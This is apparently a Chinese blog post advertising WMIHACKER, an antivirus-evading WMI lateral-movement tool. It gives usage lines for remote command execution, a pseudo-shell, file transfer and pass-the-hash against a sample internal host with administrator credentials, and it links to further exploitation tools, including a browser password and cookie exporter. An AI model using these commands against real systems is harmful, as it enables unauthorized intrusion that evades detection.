项目介绍
免杀横向渗透远程命令执行,常见的WMIEXEC、PSEXEC执行命令是创建服务或调用Win32_Process.create执行命令,这些方式都已经被杀软100%拦截,通过改造出WMIHACKER免杀横向移动测试工具。(无需445端口)
主要功能
1、命令执行
2、文件上传
3、文件下载
4、PTH使用
工具使用
C:\Users\administrator\Desktop>cscript //nologo WMIHACKER_0.6.vbs
__ ____ __ _____ _ _ _____ _ ________ _____
\ \ / / \/ |_ _| | | | | /\ / ____| |/ / ____| __ \
\ \ /\ / /| \ / | | | | |__| | / \ | | | ' /| |__ | |__) |
\ \/ \/ / | |\/| | | | | __ | / /\ \| | | < | __| | _ /
\ /\ / | | | |_| |_ | | | |/ ____ \ |____| . \| |____| | \ \
\/ \/ |_| |_|_____| |_| |_/_/ \_\_____|_|\_\______|_| \_\
v0.6beta By. Xiangshan@360RedTeam
Usage:
WMIHACKER.vbs /cmd host user pass command GETRES?
WMIHACKER.vbs /shell host user pass
WMIHACKER.vbs /upload host user pass localpath remotepath
WMIHACKER.vbs /download host user pass localpath remotepath
/cmd single command mode
host hostname or IP address
GETRES? Res Need Or Not, Use 1 Or 0
command the command to run on remote host
有命令回显执行方式
"Password!" "systeminfo" 1 cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator
无命令回显方式:
"Password!" "systeminfo > c:\1.txt" 0 cscript WMIHACKER_0.6.vbs /cmd 172.16.94.187 administrator
模拟shell模式
"Password!" cscript WMIHACKER_0.6.vbs /shell 172.16.94.187 administrator
文件上传-复制本机calc.exe到远程主机c:\calc.exe
"Password!" "c:\windows\system32\calc.exe" "c:\calc" cscript wmihacker_0.4.vbe /upload 172.16.94.187 administrator
文件下载-下载远程主机calc.exe到本地c:\calc.exe
"Password!" "c:\calc" "c:\windows\system32\calc.exe" cscript wmihacker_0.4.vbe /download 172.16.94.187 administrator
免责声明
由于传播、利用此工具提供的功能而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本人不为此承担任何责任
下载地址
回复关键字【240712】获取下载链接
·推 荐 阅 读·
最新后渗透免杀工具
【护网必备】高危漏洞综合利用工具
【护网必备】Shiro反序列化漏洞综合利用工具增强版
【护网必备】外网打点必备-WeblogicTool
【护网必备】最新Struts2全版本漏洞检测工具
Nacos漏洞综合利用工具
重点OA系统漏洞利用综合工具箱
【护网必备】海康威视RCE批量检测利用工具
【护网必备】浏览器用户密码|Cookie|书签|下载记录导出工具
横向移动之RDP&Desktop Session Hija